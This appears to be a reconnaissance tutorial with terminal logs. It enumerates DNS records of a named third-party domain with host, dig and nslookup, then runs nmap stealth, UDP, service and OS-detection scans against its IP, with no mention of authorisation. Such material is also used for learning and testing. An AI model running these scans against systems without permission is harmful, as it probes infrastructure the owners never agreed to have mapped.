HOW TO SCAN A TARGET

1. HOW TO SCAN A TARGET
2.  
3. 1. First of all localize the target that you want to scan!
4.  
5. TARGET
6.  
7. http://www.vyxunbnbs.com
8.  
9.  
10. HOW TO USE NSLOOKUP DIG HOST KNOCK TO GET DNS INFOS OF THE TARGET MACHINE:
11.  
12. ┌─[root@parrot]─[~]
13. └──╼ #host vyxunbnbs.com
14. vyxunbnbs.com has address 198.71.232.3
15. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
16. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
17.  
18. ┌─[✗]─[root@parrot]─[~]
19. └──╼ #host -t a vyxunbnbs.com
20. vyxunbnbs.com has address 198.71.232.3
21.  
22. ┌─[root@parrot]─[~]
23. └──╼ #host -t mx vyxunbnbs.com
24. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
25. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
26.  
27. ┌─[root@parrot]─[~]
28. └──╼ #host -t ns vyxunbnbs.com
29. vyxunbnbs.com name server ns67.domaincontrol.com.
30. vyxunbnbs.com name server ns68.domaincontrol.com.
31.  
32. ┌─[root@parrot]─[~]
33. └──╼ #host -t txt vyxunbnbs.com
34. vyxunbnbs.com has no TXT record
35.  
36. ┌─[root@parrot]─[~]
37. └──╼ #host -t cname vyxunbnbs.com
38. vyxunbnbs.com has no CNAME record
39.  
40. ┌─[root@parrot]─[~]
41. └──╼ #host -t soa vyxunbnbs.com
42. vyxunbnbs.com has SOA record ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
43.  
44. ┌─[root@parrot]─[~]
45. └──╼ #host vyxunbnbs.com ns67.domaincontrol.com
46. Using domain server:
47. Name: ns67.domaincontrol.com
48. Address: 216.69.185.44#53
49. Aliases:
50.  
51. vyxunbnbs.com has address 198.71.232.3
52. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
53. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
54.  
55. ┌─[root@parrot]─[~]
56. └──╼ #host vyxunbnbs.com ns68.domaincontrol.com
57. Using domain server:
58. Name: ns68.domaincontrol.com
59. Address: 208.109.255.44#53
60. Aliases:
61.  
62. vyxunbnbs.com has address 198.71.232.3
63. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
64. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
65.  
66. ┌─[root@parrot]─[~]
67. └──╼ #host -a vyxunbnbs.com
68. Trying "vyxunbnbs.com"
69. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5689
70. ;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
71.  
72. ;; QUESTION SECTION:
73. ;vyxunbnbs.com. IN ANY
74.  
75. ;; ANSWER SECTION:
76. vyxunbnbs.com. 510 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
77. vyxunbnbs.com. 455 IN A 198.71.232.3
78. vyxunbnbs.com. 2112 IN MX 0 smtp.secureserver.net.
79. vyxunbnbs.com. 2112 IN MX 10 mailstore1.secureserver.net.
80. vyxunbnbs.com. 3455 IN NS ns67.domaincontrol.com.
81. vyxunbnbs.com. 3455 IN NS ns68.domaincontrol.com.
82.  
83. Received 209 bytes from 127.0.0.1#53 in 18 ms
84.  
85. ┌─[root@parrot]─[~]
86. └──╼ #host -t any vyxunbnbs.com
87. vyxunbnbs.com has SOA record ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
88. vyxunbnbs.com has address 198.71.232.3
89. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
90. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
91. vyxunbnbs.com name server ns68.domaincontrol.com.
92. vyxunbnbs.com name server ns67.domaincontrol.com.
93.  
94. ┌─[root@parrot]─[~]
95. └──╼ #host -6 vyxunbnbs.com
96. vyxunbnbs.com has address 198.71.232.3
97. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
98. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
99.  
100. ┌─[root@parrot]─[~]
101. └──╼ #host -6 -a vyxunbnbs.com
102. Trying "vyxunbnbs.com"
103. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14190
104. ;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
105.  
106. ;; QUESTION SECTION:
107. ;vyxunbnbs.com. IN ANY
108.  
109. ;; ANSWER SECTION:
110. vyxunbnbs.com. 471 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
111. vyxunbnbs.com. 416 IN A 198.71.232.3
112. vyxunbnbs.com. 2073 IN MX 10 mailstore1.secureserver.net.
113. vyxunbnbs.com. 2073 IN MX 0 smtp.secureserver.net.
114. vyxunbnbs.com. 3416 IN NS ns67.domaincontrol.com.
115. vyxunbnbs.com. 3416 IN NS ns68.domaincontrol.com.
116.  
117. Received 209 bytes from ::1#53 in 14 ms
118.  
119. ┌─[✗]─[root@parrot]─[~]
120. └──╼ #host -6 vyxunbnbs.com ns67.domaincontrol.com
121. ;; connection timed out; no servers could be reached
122.  
123. ┌─[✗]─[root@parrot]─[~]
124. └──╼ #host -6 vyxunbnbs.com ns68.domaincontrol.com
125. ;; connection timed out; no servers could be reached
126.  
127. ┌─[✗]─[root@parrot]─[~]
128. └──╼ #host -6 -t ns vyxunbnbs.com ns68.domaincontrol.com
129. ;; connection timed out; no servers could be reached
130.  
131. ┌─[✗]─[root@parrot]─[~]
132. └──╼ #host -6 -t ns vyxunbnbs.com ns67.domaincontrol.com
133. ;; connection timed out; no servers could be reached
134.  
135. ┌─[✗]─[root@parrot]─[~]
136. └──╼ #host 198.71.232.3
137. 3.232.71.198.in-addr.arpa domain name pointer ip-198-71-232-3.ip.secureserver.net.
138.  
139. ┌─[root@parrot]─[~]
140. └──╼ #host -v -t a vyxunbnbs.com
141. Trying "vyxunbnbs.com"
142. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21861
143. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
144.  
145. ;; QUESTION SECTION:
146. ;vyxunbnbs.com. IN A
147.  
148. ;; ANSWER SECTION:
149. vyxunbnbs.com. 259 IN A 198.71.232.3
150.  
151. Received 47 bytes from 127.0.0.1#53 in 1 ms
152.  
153. ┌─[root@parrot]─[~]
154. └──╼ #host -v -t a ip-198-71-232-3.ip.secureserver.net
155. Trying "ip-198-71-232-3.ip.secureserver.net"
156. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38259
157. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
158.  
159. ;; QUESTION SECTION:
160. ;ip-198-71-232-3.ip.secureserver.net. IN A
161.  
162. ;; ANSWER SECTION:
163. ip-198-71-232-3.ip.secureserver.net. 3600 IN A 198.71.232.3
164.  
165. Received 69 bytes from 127.0.0.1#53 in 44 ms
166.  
167. ┌─[root@parrot]─[~]
168. └──╼ #dig vyxunbnbs.com a
169.  
170. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com a
171. ;; global options: +cmd
172. ;; Got answer:
173. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8729
174. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
175.  
176. ;; OPT PSEUDOSECTION:
177. ; EDNS: version: 0, flags:; udp: 4096
178. ;; QUESTION SECTION:
179. ;vyxunbnbs.com. IN A
180.  
181. ;; ANSWER SECTION:
182. vyxunbnbs.com. 164 IN A 198.71.232.3
183.  
184. ;; Query time: 0 msec
185. ;; SERVER: 127.0.0.1#53(127.0.0.1)
186. ;; WHEN: Sun May 29 14:18:00 CEST 2016
187. ;; MSG SIZE rcvd: 58
188.  
189. ┌─[root@parrot]─[~]
190. └──╼ #dig vyxunbnbs.com mx
191.  
192. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com mx
193. ;; global options: +cmd
194. ;; Got answer:
195. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62678
196. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
197.  
198. ;; OPT PSEUDOSECTION:
199. ; EDNS: version: 0, flags:; udp: 4096
200. ;; QUESTION SECTION:
201. ;vyxunbnbs.com. IN MX
202.  
203. ;; ANSWER SECTION:
204. vyxunbnbs.com. 1816 IN MX 10 mailstore1.secureserver.net.
205. vyxunbnbs.com. 1816 IN MX 0 smtp.secureserver.net.
206.  
207. ;; Query time: 19 msec
208. ;; SERVER: 127.0.0.1#53(127.0.0.1)
209. ;; WHEN: Sun May 29 14:18:04 CEST 2016
210. ;; MSG SIZE rcvd: 106
211.  
212. ┌─[root@parrot]─[~]
213. └──╼ #dig vyxunbnbs.com ns
214.  
215. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com ns
216. ;; global options: +cmd
217. ;; Got answer:
218. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60292
219. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
220.  
221. ;; OPT PSEUDOSECTION:
222. ; EDNS: version: 0, flags:; udp: 4096
223. ;; QUESTION SECTION:
224. ;vyxunbnbs.com. IN NS
225.  
226. ;; ANSWER SECTION:
227. vyxunbnbs.com. 3156 IN NS ns68.domaincontrol.com.
228. vyxunbnbs.com. 3156 IN NS ns67.domaincontrol.com.
229.  
230. ;; Query time: 12 msec
231. ;; SERVER: 127.0.0.1#53(127.0.0.1)
232. ;; WHEN: Sun May 29 14:18:07 CEST 2016
233. ;; MSG SIZE rcvd: 94
234.  
235. ┌─[root@parrot]─[~]
236. └──╼ #dig vyxunbnbs.com txt
237.  
238. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com txt
239. ;; global options: +cmd
240. ;; Got answer:
241. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36884
242. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
243.  
244. ;; OPT PSEUDOSECTION:
245. ; EDNS: version: 0, flags:; udp: 4096
246. ;; QUESTION SECTION:
247. ;vyxunbnbs.com. IN TXT
248.  
249. ;; AUTHORITY SECTION:
250. vyxunbnbs.com. 180 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
251.  
252. ;; Query time: 12 msec
253. ;; SERVER: 127.0.0.1#53(127.0.0.1)
254. ;; WHEN: Sun May 29 14:18:13 CEST 2016
255. ;; MSG SIZE rcvd: 110
256.  
257. ┌─[root@parrot]─[~]
258. └──╼ #dig vyxunbnbs.com soa
259.  
260. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com soa
261. ;; global options: +cmd
262. ;; Got answer:
263. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39124
264. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
265.  
266. ;; OPT PSEUDOSECTION:
267. ; EDNS: version: 0, flags:; udp: 4096
268. ;; QUESTION SECTION:
269. ;vyxunbnbs.com. IN SOA
270.  
271. ;; ANSWER SECTION:
272. vyxunbnbs.com. 200 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
273.  
274. ;; Query time: 12 msec
275. ;; SERVER: 127.0.0.1#53(127.0.0.1)
276. ;; WHEN: Sun May 29 14:18:18 CEST 2016
277. ;; MSG SIZE rcvd: 110
278.  
279. ┌─[root@parrot]─[~]
280. └──╼ #dig vyxunbnbs.com cname
281.  
282. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com cname
283. ;; global options: +cmd
284. ;; Got answer:
285. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22218
286. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
287.  
288. ;; OPT PSEUDOSECTION:
289. ; EDNS: version: 0, flags:; udp: 4096
290. ;; QUESTION SECTION:
291. ;vyxunbnbs.com. IN CNAME
292.  
293. ;; AUTHORITY SECTION:
294. vyxunbnbs.com. 171 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
295.  
296. ;; Query time: 18 msec
297. ;; SERVER: 127.0.0.1#53(127.0.0.1)
298. ;; WHEN: Sun May 29 14:18:38 CEST 2016
299. ;; MSG SIZE rcvd: 110
300.  
301. ┌─[root@parrot]─[~]
302. └──╼ #dig +trace vyxunbnbs.com
303.  
304. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> +trace vyxunbnbs.com
305. ;; global options: +cmd
306. . 287648 IN NS c.root-servers.net.
307. . 287648 IN NS i.root-servers.net.
308. . 287648 IN NS d.root-servers.net.
309. . 287648 IN NS a.root-servers.net.
310. . 287648 IN NS f.root-servers.net.
311. . 287648 IN NS b.root-servers.net.
312. . 287648 IN NS l.root-servers.net.
313. . 287648 IN NS k.root-servers.net.
314. . 287648 IN NS g.root-servers.net.
315. . 287648 IN NS e.root-servers.net.
316. . 287648 IN NS m.root-servers.net.
317. . 287648 IN NS h.root-servers.net.
318. . 287648 IN NS j.root-servers.net.
319. . 510154 IN RRSIG NS 8 0 518400 20160608050000 20160529040000 60615 . LS0Bk52wYFCmp8Sk08+ePPeZV1ar3AciH05VrH5wlzpc5L1j7fW+Td6b 6yN+34QBVGQ+U0YqDCg8K63nUFxdEY1zGW2v9YjzvdNwVI7UnLIpqNK7 KNny7GHnoS/iB5T6wGeoXlJrlmCqGrhtbAuXdlkbViOELcbpK5ZvGs6L w3s=
320. ;; Received 397 bytes from 127.0.0.1#53(127.0.0.1) in 264 ms
321.  
322. com. 172800 IN NS l.gtld-servers.net.
323. com. 172800 IN NS c.gtld-servers.net.
324. com. 172800 IN NS f.gtld-servers.net.
325. com. 172800 IN NS h.gtld-servers.net.
326. com. 172800 IN NS b.gtld-servers.net.
327. com. 172800 IN NS k.gtld-servers.net.
328. com. 172800 IN NS e.gtld-servers.net.
329. com. 172800 IN NS j.gtld-servers.net.
330. com. 172800 IN NS m.gtld-servers.net.
331. com. 172800 IN NS i.gtld-servers.net.
332. com. 172800 IN NS g.gtld-servers.net.
333. com. 172800 IN NS a.gtld-servers.net.
334. com. 172800 IN NS d.gtld-servers.net.
335. com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
336. com. 86400 IN RRSIG DS 8 1 86400 20160608050000 20160529040000 60615 . D/SvLl6M/vyF6MOKUE220+xQgbpwKHLA+7eJedh6oJwvXiXB6QAPalag hfjxDtzqQ71OYQk0TyOOcW2CaTqduszIQjf/ckB9RAds1aip3b+BWMvq lSFtLCuKsFmKZkkAhhlNZRyVFc9s8wLW+G/RL52sQpRGMBLo3etB2/uX ckg=
337. ;; Received 737 bytes from 192.36.148.17#53(i.root-servers.net) in 305 ms
338.  
339. vyxunbnbs.com. 172800 IN NS ns67.domaincontrol.com.
340. vyxunbnbs.com. 172800 IN NS ns68.domaincontrol.com.
341. CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
342. CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20160603045915 20160527034915 34745 com. pkQ5LWptuG019VnVIJOYy/noEwncYk2kml2Qkf+aTLF7lPHdRvcCkC0h ruJdoZAMHgX7byAmPSR9vi8q6OvKdXVmsMKfUBdLMNMpUhaBHpcTe1AI ezemeJmvAjVyqo7wVYwGa1/Y9ZHuUC9zKmc1xGbtP+jB/GiZHz9vShwH ohc=
343. 9M14O3KSMS2015V8C22L03OVH85RIG84.com. 86400 IN NSEC3 1 1 0 - 9M17MO9DKQOAC1TE5B8KURUTFNKS98J7 NS DS RRSIG
344. 9M14O3KSMS2015V8C22L03OVH85RIG84.com. 86400 IN RRSIG NSEC3 8 2 86400 20160604043916 20160528032916 34745 com. Cfkvje5CuuZtOQPGsBBMYJm3/6g3IRh7U6QorY6chCMhRiMWGAXKTwQL 84cGbqkma5Iz9A3BwYRdSqx9u27Ou2QA3ipt8zKJaD6ed0IeI2SbU8QZ HLuKxAcheIIqTf1pHy2cvkEjMDW6k3EHqdKR1goBKrESteb7ZPW7v0hY ih8=
345. ;; Received 611 bytes from 192.5.6.30#53(a.gtld-servers.net) in 122 ms
346.  
347. vyxunbnbs.com. 600 IN A 198.71.232.3
348. vyxunbnbs.com. 3600 IN NS ns68.domaincontrol.com.
349. vyxunbnbs.com. 3600 IN NS ns67.domaincontrol.com.
350. ;; Received 110 bytes from 208.109.255.44#53(ns68.domaincontrol.com) in 30 ms
351.  
352. ┌─[root@parrot]─[~]
353. └──╼ #dig +short vyxunbnbs.com
354. 198.71.232.3
355.  
356. ┌─[root@parrot]─[~]
357. └──╼ #dig +noall +answer vyxunbnbs.com any
358. vyxunbnbs.com. 108 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
359. vyxunbnbs.com. 53 IN A 198.71.232.3
360. vyxunbnbs.com. 1710 IN MX 0 smtp.secureserver.net.
361. vyxunbnbs.com. 1710 IN MX 10 mailstore1.secureserver.net.
362. vyxunbnbs.com. 3053 IN NS ns67.domaincontrol.com.
363. vyxunbnbs.com. 3053 IN NS ns68.domaincontrol.com.
364.  
365. ┌─[root@parrot]─[~]
366. └──╼ #dig -x +short 198.71.232.3
367.  
368. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> -x +short 198.71.232.3
369. ;; global options: +cmd
370. ;; Got answer:
371. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54927
372. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
373.  
374. ;; OPT PSEUDOSECTION:
375. ; EDNS: version: 0, flags:; udp: 4096
376. ;; QUESTION SECTION:
377. ;+short.in-addr.arpa. IN PTR
378.  
379. ;; AUTHORITY SECTION:
380. in-addr.arpa. 3599 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073655 1800 900 604800 3600
381.  
382. ;; Query time: 11 msec
383. ;; SERVER: ::1#53(::1)
384. ;; WHEN: Sun May 29 14:21:01 CEST 2016
385. ;; MSG SIZE rcvd: 116
386.  
387. ;; Got answer:
388. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27483
389. ;; flags: qr aa rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
390.  
391. ;; OPT PSEUDOSECTION:
392. ; EDNS: version: 0, flags:; udp: 4096
393. ;; QUESTION SECTION:
394. ;198.71.232.3. IN A
395.  
396. ;; ANSWER SECTION:
397. 198.71.232.3. 0 IN A 198.71.232.3
398.  
399. ;; Query time: 0 msec
400. ;; SERVER: 127.0.0.1#53(127.0.0.1)
401. ;; WHEN: Sun May 29 14:21:01 CEST 2016
402. ;; MSG SIZE rcvd: 57
403.  
404. ┌─[root@parrot]─[~]
405. └──╼ #dig -x 198.71.232.3 +short
406. ip-198-71-232-3.ip.secureserver.net.
407.  
408. ┌─[root@parrot]─[~]
409. └──╼ #dig +nssearch vyxunbnbs.com
410. SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600 from server 216.69.185.44 in 30 ms.
411. SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600 from server 208.109.255.44 in 30 ms.
412. ;; connection timed out; no servers could be reached
413.  
414. ┌─[✗]─[root@parrot]─[~]
415. └──╼ #dig +nocmd +noall +answer a vyxunbnbs.com
416. vyxunbnbs.com. 600 IN A 198.71.232.3
417.  
418. ┌─[root@parrot]─[~]
419. └──╼ #dig +nocmd +noall +answer mx vyxunbnbs.com
420. vyxunbnbs.com. 1529 IN MX 0 smtp.secureserver.net.
421. vyxunbnbs.com. 1529 IN MX 10 mailstore1.secureserver.net.
422.  
423. ┌─[root@parrot]─[~]
424. └──╼ #dig +nocmd +noall +answer ns vyxunbnbs.com
425. vyxunbnbs.com. 2868 IN NS ns67.domaincontrol.com.
426. vyxunbnbs.com. 2868 IN NS ns68.domaincontrol.com.
427.  
428. ┌─[root@parrot]─[~]
429. └──╼ #dig +nocmd +noall +answer cname vyxunbnbs.com
430.  
431. ┌─[root@parrot]─[~]
432. └──╼ #dig +nocmd +noall +answer txt vyxunbnbs.com
433.  
434. ┌─[root@parrot]─[~]
435. └──╼ #dig +nocmd +noall +answer url vyxunbnbs.com
436. vyxunbnbs.com. 554 IN A 198.71.232.3
437.  
438. ┌─[root@parrot]─[~]
439. └──╼ #dig vyxunbnbs.com +dnssec
440.  
441. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com +dnssec
442. ;; global options: +cmd
443. ;; Got answer:
444. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12137
445. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
446.  
447. ;; OPT PSEUDOSECTION:
448. ; EDNS: version: 0, flags: do; udp: 4096
449. ;; QUESTION SECTION:
450. ;vyxunbnbs.com. IN A
451.  
452. ;; ANSWER SECTION:
453. vyxunbnbs.com. 446 IN A 198.71.232.3
454.  
455. ;; Query time: 16 msec
456. ;; SERVER: 127.0.0.1#53(127.0.0.1)
457. ;; WHEN: Sun May 29 15:14:48 CEST 2016
458. ;; MSG SIZE rcvd: 58
459.  
460. ┌─[root@parrot]─[/home/roy/Desktop]
461. └──╼ #nslookup
462. > set type=A
463. > www.vyxunbnbs.com
464. Server: 127.0.0.1
465. Address: 127.0.0.1#53
466.  
467. Non-authoritative answer:
468. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
469. Name: vyxunbnbs.com
470. Address: 198.71.232.3
471. > set type=MX
472. > www.vyxunbnbs.com
473. Server: 127.0.0.1
474. Address: 127.0.0.1#53
475.  
476. Non-authoritative answer:
477. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
478. vyxunbnbs.com mail exchanger = 0 smtp.secureserver.net.
479. vyxunbnbs.com mail exchanger = 10 mailstore1.secureserver.net.
480.  
481. Authoritative answers can be found from:
482. > set type=ns
483. > www.vyxunbnbs.com
484. Server: 127.0.0.1
485. Address: 127.0.0.1#53
486.  
487. Non-authoritative answer:
488. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
489. vyxunbnbs.com nameserver = ns68.domaincontrol.com.
490. vyxunbnbs.com nameserver = ns67.domaincontrol.com.
491.  
492. Authoritative answers can be found from:
493. > set type=cname
494. > www.vyxunbnbs.com
495. Server: 127.0.0.1
496. Address: 127.0.0.1#53
497.  
498. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
499.  
500. ┌─[root@parrot]─[~]
501. └──╼ #nslookup
502. > set type=TXT
503. > www.vyxunbnbs.com
504. Server: 127.0.0.1
505. Address: 127.0.0.1#53
506.  
507. Non-authoritative answer:
508. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
509.  
510. Authoritative answers can be found from:
511. vyxunbnbs.com
512. origin = ns67.domaincontrol.com
513. mail addr = dns.jomax.net
514. serial = 2016052700
515. refresh = 28800
516. retry = 7200
517. expire = 604800
518. minimum = 600
519. >
520.  
521. > set type=SOA
522. > www.vyxunbnbs.com
523. Server: 127.0.0.1
524. Address: 127.0.0.1#53
525.  
526. Non-authoritative answer:
527. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
528. vyxunbnbs.com
529. origin = ns67.domaincontrol.com
530. mail addr = dns.jomax.net
531. serial = 2016052700
532. refresh = 28800
533. retry = 7200
534. expire = 604800
535. minimum = 600
536.  
537. Authoritative answers can be found from:
538. >
539.  
540.  
541. RUN RATPROXY
542.  
543. ┌─[root@parrot]─[~]
544. └──╼ #ratproxy
545. ratproxy version 1.58-beta by <lcamtuf@google.com>
546.  
547. [!] WARNING: Running with no command-line config options specified. This is
548. almost certainly not what you want, as most checks are disabled. Please
549. consult the documentation or use --help for more information.
550.  
551. [*] Proxy configured successfully. Have fun, and please do not be evil.
552. [+] Accepting connections on port 8080/tcp (local only)...
553.  
554. do not close the window...minimize it and open a new terminal!
555.  
556.  
557. RUN NMAP
558.  
559. ┌─[✗]─[root@parrot]─[~]
560. └──╼ #nmap -sV -Pn 198.71.232.3
561.  
562. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 12:03 CEST
563. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
564. Nmap scan report for 198.71.232.3
565. Host is up (0.11s latency).
566. Not shown: 998 filtered ports
567. PORT STATE SERVICE VERSION
568. 80/tcp open http Samsung AllShare httpd
569. 443/tcp open ssl/http Samsung AllShare httpd
570.  
571. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
572. Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds
573.  
574.  
575. ┌─[root@parrot]─[~]
576. └──╼ #nmap -sS -sU -T4 -A -v 198.71.232.3
577.  
578. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 12:04 CEST
579. NSE: Loaded 132 scripts for scanning.
580. NSE: Script Pre-scanning.
581. Initiating NSE at 12:04
582. Completed NSE at 12:04, 0.00s elapsed
583. Initiating NSE at 12:04
584. Completed NSE at 12:04, 0.00s elapsed
585. Initiating Ping Scan at 12:04
586. Scanning 198.71.232.3 [4 ports]
587. Completed Ping Scan at 12:04, 0.11s elapsed (1 total hosts)
588. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
589. Initiating SYN Stealth Scan at 12:04
590. Scanning 198.71.232.3 [1000 ports]
591. Discovered open port 443/tcp on 198.71.232.3
592. Discovered open port 80/tcp on 198.71.232.3
593. Completed SYN Stealth Scan at 12:04, 9.18s elapsed (1000 total ports)
594. Initiating UDP Scan at 12:04
595. Scanning 198.71.232.3 [1000 ports]
596. Completed UDP Scan at 12:05, 5.55s elapsed (1000 total ports)
597. Initiating Service scan at 12:05
598. Scanning 1002 services on 198.71.232.3
599. Service scan Timing: About 0.40% done
600. Service scan Timing: About 3.29% done; ETC: 13:33 (1:25:39 remaining)
601. Service scan Timing: About 6.29% done; ETC: 13:14 (1:05:05 remaining)
602. Service scan Timing: About 9.28% done; ETC: 13:07 (0:57:01 remaining)
603. Service scan Timing: About 12.28% done; ETC: 13:04 (0:52:10 remaining)
604. Service scan Timing: About 15.27% done; ETC: 13:02 (0:48:33 remaining)
605. Service scan Timing: About 20.86% done; ETC: 12:54 (0:39:05 remaining)
606. Service scan Timing: About 21.26% done; ETC: 12:59 (0:43:13 remaining)
607. Service scan Timing: About 26.75% done; ETC: 12:54 (0:36:12 remaining)
608. Service scan Timing: About 27.25% done; ETC: 12:58 (0:38:57 remaining)
609. Service scan Timing: About 32.73% done; ETC: 12:54 (0:33:09 remaining)
610. Service scan Timing: About 38.72% done; ETC: 12:54 (0:30:09 remaining)
611. Service scan Timing: About 44.71% done; ETC: 12:54 (0:27:10 remaining)
612. Service scan Timing: About 50.70% done; ETC: 12:54 (0:24:12 remaining)
613. Service scan Timing: About 56.69% done; ETC: 12:54 (0:21:14 remaining)
614. Service scan Timing: About 62.67% done; ETC: 12:54 (0:18:18 remaining)
615. Service scan Timing: About 68.56% done; ETC: 12:54 (0:15:25 remaining)
616. Service scan Timing: About 74.55% done; ETC: 12:54 (0:12:29 remaining)
617. Service scan Timing: About 80.54% done; ETC: 12:54 (0:09:32 remaining)
618. Service scan Timing: About 86.03% done; ETC: 12:54 (0:06:53 remaining)
619. Service scan Timing: About 92.02% done; ETC: 12:54 (0:03:56 remaining)
620. Service scan Timing: About 98.00% done; ETC: 12:54 (0:00:59 remaining)
621. Completed Service scan at 12:54, 2976.47s elapsed (1002 services on 1 host)
622. Initiating OS detection (try #1) against 198.71.232.3
623. Retrying OS detection (try #2) against 198.71.232.3
624. Initiating Traceroute at 12:54
625. Completed Traceroute at 12:54, 3.05s elapsed
626. NSE: Script scanning 198.71.232.3.
627. Initiating NSE at 12:54
628. Completed NSE at 12:58, 216.46s elapsed
629. Initiating NSE at 12:58
630. Completed NSE at 12:58, 0.24s elapsed
631. Nmap scan report for 198.71.232.3
632. Host is up (0.11s latency).
633. Not shown: 1000 open|filtered ports, 998 filtered ports
634. PORT STATE SERVICE VERSION
635. 80/tcp open http Samsung AllShare httpd
636. | http-methods:
637. |_ Supported Methods: GET HEAD POST OPTIONS
638. |_http-server-header: DPS/1.0.3
639. |_http-title: 404 Not Found
640. 443/tcp open ssl/http Samsung AllShare httpd
641. |_http-server-header: DPS/1.0.3
642. |_http-title: 404 Not Found
643. | ssl-cert: Subject: commonName=*.godaddysites.com/organizationName=GoDaddy.com, LLC/stateOrProvinceName=Arizona/countryName=US
644. | Issuer: commonName=Go Daddy Secure Certification Authority/organizationName=GoDaddy.com, Inc./stateOrProvinceName=Arizona/countryName=US
645. | Public Key type: rsa
646. | Public Key bits: 2048
647. | Signature Algorithm: sha1WithRSAEncryption
648. | Not valid before: 2013-12-09T21:03:50
649. | Not valid after: 2016-12-09T21:03:50
650. | MD5: b9fa bb00 6886 5d4c 47be 2cae 6529 fdce
651. |_SHA-1: 95a5 92da fdd9 dcb8 e554 5599 1d1b 5ae1 7f0f d2c7
652. |_ssl-date: TLS randomness does not represent time
